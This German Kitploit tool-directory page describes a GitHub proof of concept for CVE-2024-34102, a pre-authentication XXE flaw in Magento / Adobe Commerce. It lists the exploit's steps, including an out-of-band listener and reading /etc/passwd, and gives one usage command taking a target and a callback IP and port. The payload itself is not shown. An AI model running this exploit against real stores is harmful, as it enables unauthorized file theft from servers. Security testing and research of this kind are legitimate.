Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-34102 — PoC für CVE-2024-34102. Eine XML-Entity-Injection-Schwachstelle vor der Authentifizierung in Magento / Adobe Commerce. | Kitploit
Tools/GitHubGitHub/bigb0x/cve-2024-34102
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubbigb0x/cve-2024-34102

CVE-2024-34102

PoC für CVE-2024-34102. Eine XML-Entity-Injection-Schwachstelle vor der Authentifizierung in Magento / Adobe Commerce.

Repository anzeigen
3113vor 2 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-34102

POC für CVE-2024-34102. Eine XML-Entity-Injection-Schwachstelle vor der Authentifizierung in Magento / Adobe Commerce.

Banner

Überblick

Dieser POC versucht, Dateien von Zielhosts zu lesen, die anfällig für die aktuelle Magento / Adobe Commerce CVE-2024-34102 sind. Dieser POC basiert auf dieser Sicherheitswarnung und dieser Forschung von Assetnote.

Verwendung

Um diesen POC auszuführen, benötigen Sie einen Rechner mit einer veröffentlichten und erreichbaren IP-Adresse.

Was dieser POC tut

  1. Erstellt eine lokale Datei poc.xml, die die Hauptpayloads enthält.
  2. Sendet den Payload per POST-Anfrage an das Ziel.
  3. Richtet einen Listener auf Ihrem Rechner für eingehende GET-Anfragen vom Ziel ein.
  4. Versucht, Dateien vom Ziel zu lesen (Standard: /etc/passwd).

Mindestanforderungen

  • Python 3.6 oder höher
  • requests-Bibliothek

So verwenden Sie diesen POC gegen ein einzelnes Ziel:

root@kitploit:~
python cve-2024-34102.py -u target -ip your-machine-ip -p any-open-port-in-your-machine -r file-to-read-from-target (default is /etc/passwd)

Kontakt

Bei Anregungen oder Fragen kontaktieren Sie mich bitte unter meinem Profil.

Haftungsausschluss

Dieses bereitgestellte Tool dient ausschließlich Bildungszwecken. Ich befürworte, unterstütze oder toleriere keinen unbefugten Zugriff auf Systeme oder Netzwerke. Verwenden Sie dieses Tool verantwortungsbewusst und nur auf Systemen, für die Sie ausdrückliche Erlaubnis zum Testen haben. Jegliche Handlungen und Konsequenzen, die aus dem Missbrauch dieses Tools resultieren, liegen in Ihrer eigenen Verantwortung.

Referenzen

  • https://github.com/spacewasp/public_docs/blob/main/CVE-2024-34102.md
  • https://www.assetnote.io/resources/research/why-nested-deserialization-is-harmful-magento-xxe-cve-2024-34102
Tool herunterladen